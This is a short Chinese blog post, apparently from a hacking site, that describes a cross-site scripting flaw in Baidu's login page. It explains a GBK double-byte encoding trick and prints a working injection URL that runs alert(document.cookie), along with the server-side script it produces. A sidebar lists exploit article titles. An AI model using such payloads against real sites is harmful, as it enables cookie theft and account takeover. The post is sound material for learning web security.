|
[推荐]百度的JS数据流注入型跨站
今天看到的百度贴吧XSS有属于这种类型的,不过仅在FF下有效,原因是在GBK字符集及其子集(或更高级的双字节字符集)编码环境下构造类似于包含%c1′这样的双字节字符串时,提交给服务端,返回。在这整个处理过程的任何一环节,FF都会单独处理这两个字节(%c1与’),而服务端却认为这是一个完整的双字节字符,这导致了单引号这样的特殊字符可以侥幸在FF下残留下来。IE不行,那是因为它也认为这两个字节构成了一个双字节字符。
貌似说的有点乱。
将恶意构造的数据作为参数注入到服务端返回的JS数据流中,百度似乎很容易忽略这的过滤。比如这个:
| 以下是引用片段: https://passport.baidu.com/?login&u=./?”</script><script>alert(document.cookie)// |
| 以下是引用片段: <script> var url=”./?\”</script><script>alert(document.cookie)//” url=url.replace(/^\.\//gi,”http://passport.baidu.com/“); location.href=url; </script> |
http://hi.baidu.com/monyer/blog/item/1e53d3004f373c14738b6548.html
http://hi.baidu.com/80sec/blog/item/09adb11a5bd60f1c8718bf2a.html
http://hi.baidu.com/ycosxhack/blog/item/7bfdc8194ee2657edbb4bdc8.html
| 新云CMS Online.asp页面过滤不严 | 02-26 |
| 对网软网上购物系统的漏洞分析 | 01-09 |
| 测试SQL防注入脚本 | 12-21 |
| Google Xss又出跨站新漏洞 | 11-06 |
| 一次简单的html injection导致的 | 11-06 |
| 风讯、科讯漏洞利用 | 11-01 |
| Adobe pdf reader URI利用方式浅 | 10-23 |
| 超星阅览器的最新0DAY | 10-19 |
| 运用SQL Injection做数据库渗透的 | 09-22 |
| sa-blog 0day | 09-22 |
| HTML注入的一些简单想法 | 09-10 |
| 网站登陆接口的攻与防 | 09-04 |
您现在的位置: